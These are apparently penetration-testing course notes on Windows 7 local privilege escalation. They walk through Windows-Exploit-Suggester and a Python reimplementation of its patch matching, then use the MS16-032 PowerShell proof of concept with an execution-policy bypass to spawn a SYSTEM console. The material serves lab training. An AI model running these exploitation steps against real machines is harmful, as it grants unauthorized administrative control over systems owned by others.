Windows Desktop

  • Windows 7 was made end-of-life on January 14, 2020, but is still in use in many environments.

Windows 7 Case Study

  • Using - https://github.com/AonCyberLabs/Windows-Exploit-Suggester (Python 2 tool that compares a target's systeminfo output against Microsoft's security bulletin spreadsheet)
  • If installation issues arise (missing Python 2 modules), see the dependency install steps below.

Install Python Dependencies (local VM only)

  • This tool works out of the box on the Pwnbox, but to get it working on a local Parrot VM we need to install its Python 2 dependencies (setuptools, and xlrd, which the tool uses to read the .xls bulletin database) with versions that still install under python2.7:

    # setuptools, needed to run the setup.py installers below
    $ sudo wget https://files.pythonhosted.org/packages/28/84/27df240f3f8f52511965979aad7c7b77606f8fe41d4c90f2449e02172bb1/setuptools-2.0.tar.gz
    $ sudo tar -xf setuptools-2.0.tar.gz
    $ cd setuptools-2.0/
    $ sudo python2.7 setup.py install

    # xlrd, used by the suggester to parse the downloaded .xls database
    $ sudo wget https://files.pythonhosted.org/packages/42/85/25caf967c2d496067489e0bb32df069a8361e1fd96a7e9f35408e56b3aab/xlrd-1.0.0.tar.gz
    $ sudo tar -xf xlrd-1.0.0.tar.gz
    $ cd xlrd-1.0.0/
    $ sudo python2.7 setup.py install
    

  • Gathering systeminfo command output on the target and saving it to a text file (e.g. win7lpe-systeminfo.txt) that we copy back to the attacking machine

    • systeminfo
  • Updating the local Microsoft vulnerability database (downloads the current security bulletin spreadsheet and saves it as a dated .xls file, e.g. 2021-05-13-mssb.xls)
    • sudo python2.7 windows-exploit-suggester.py --update
  • Running the Windows Exploit Suggester against the saved systeminfo output; it lists bulletins whose fix KB is not in the target's hotfix list
    • python2.7 windows-exploit-suggester.py --database 2021-05-13-mssb.xls --systeminfo win7lpe-systeminfo.txt
  • If we already have a Meterpreter session, as in the previous exercise, Metasploit's post/multi/recon/local_exploit_suggester module does the same job from inside the session - https://www.rapid7.com/blog/post/2015/08/11/metasploit-local-exploit-suggester-do-less-get-more/
  • MS16-032 (CVE-2016-0099, privileged thread handle leaked by the Secondary Logon service) - https://googleprojectzero.blogspot.com/2016/03/exploiting-leaked-thread-handle.html
  • Exploiting MS16-032 with the PowerShell PoC
    • use PoC - https://www.exploit-db.com/exploits/39719 (Invoke-MS16-032.ps1)
    • Set-ExecutionPolicy Bypass -Scope Process
    • Import-Module .\Invoke-MS16-032.ps1
    • Invoke-MS16-032
    • This works and we spawn a SYSTEM cmd console; confirm with whoami in the new window, which should return nt authority\system.
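To make the gather-update-run procedure above less of a black box, here is an added Python 3 example (written for these notes, not code from Windows-Exploit-Suggester) that reimplements the core of what the suggester does: read the target's systeminfo output, extract the OS product and installed KBs, and report bulletins for that product whose KB is missing. The systeminfo sample and the three-row bulletin table are constructed for the example; MS16-032/KB3139914 and MS15-051/KB3045171 are the real bulletin/KB pairs, the third row is a hypothetical entry for another product. It also handles the encoding trap that breaks the real tool most often: `systeminfo > file.txt` run from PowerShell writes UTF-16LE with a BOM. The real spreadsheet carries many more columns (severity, superseding KBs) that this simplification ignores, and the parser keys on English systeminfo labels.

```python
import re

# Constructed sample of `systeminfo` output from a Windows 7 SP1 host.
# Hostname and hotfix list are made up for the example; the line layout
# matches what the real command prints.
SAMPLE_SYSTEMINFO = """\
Host Name:                 WIN7LPE
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB3045171
                           [03]: KB976902
"""

# Hand-built excerpt standing in for the mssb.xls that `--update` downloads.
# The first two rows are real bulletin/KB pairs; the third is hypothetical
# and exists only so the product filter has something to discard.
BULLETINS = [
    {"bulletin": "MS16-032", "kb": "KB3139914", "product": "Windows 7",
     "title": "Secondary Logon EoP (CVE-2016-0099)"},
    {"bulletin": "MS15-051", "kb": "KB3045171", "product": "Windows 7",
     "title": "Win32k EoP (CVE-2015-1701)"},
    {"bulletin": "MS99-001", "kb": "KB9999999", "product": "Windows 10",
     "title": "hypothetical entry for another product"},
]


def decode_systeminfo(raw: bytes) -> str:
    """Decode a saved systeminfo file, honouring a UTF-16 BOM.

    PowerShell redirection writes UTF-16LE; reading that as UTF-8 yields
    NUL-padded text that no field regex will match.
    """
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16")
    return raw.decode("utf-8", errors="replace")


def parse_systeminfo(text: str) -> dict:
    """Pull out the fields the suggester keys on: OS name/version/arch and KBs."""
    info = {"hotfixes": set()}
    for line in text.splitlines():
        field = re.match(r"^(OS Name|OS Version|System Type):\s*(.+?)\s*$", line)
        if field:
            info[field.group(1)] = field.group(2)
            continue
        kb = re.match(r"^\s*\[\d+\]:\s*(KB\d+)", line)
        if kb:
            info["hotfixes"].add(kb.group(1))
    return info


def product_of(info: dict) -> str:
    """Map 'Microsoft Windows 7 Professional' to the bulletin product 'Windows 7'."""
    m = re.search(r"Windows (Server \d{4}(?: R2)?|Vista|XP|\d+(?:\.\d+)?)",
                  info.get("OS Name", ""))
    return "Windows " + m.group(1) if m else info.get("OS Name", "")


def missing_patches(info: dict, bulletins: list) -> list:
    """Bulletins for this product whose fix KB is absent from the hotfix list."""
    product = product_of(info)
    return [b for b in bulletins
            if b["product"] == product and b["kb"] not in info["hotfixes"]]


def suggest(raw: bytes, bulletins: list = BULLETINS) -> list:
    """End to end: decode -> parse -> match. Returns bulletin IDs."""
    info = parse_systeminfo(decode_systeminfo(raw))
    return [b["bulletin"] for b in missing_patches(info, bulletins)]


if __name__ == "__main__":
    info = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(f"{info['OS Name']} / {info['OS Version']} / {info['System Type']}")
    for b in missing_patches(info, BULLETINS):
        print(f"[E] {b['bulletin']}: {b['title']} (missing {b['kb']})")
```

On the constructed sample, MS15-051 is dropped because KB3045171 is installed, the Windows 10 row is dropped by the product filter, and MS16-032 is reported, which is exactly the path the notes then follow with the Invoke-MS16-032 PoC. The same result comes back whether the file was saved as UTF-8 or UTF-16.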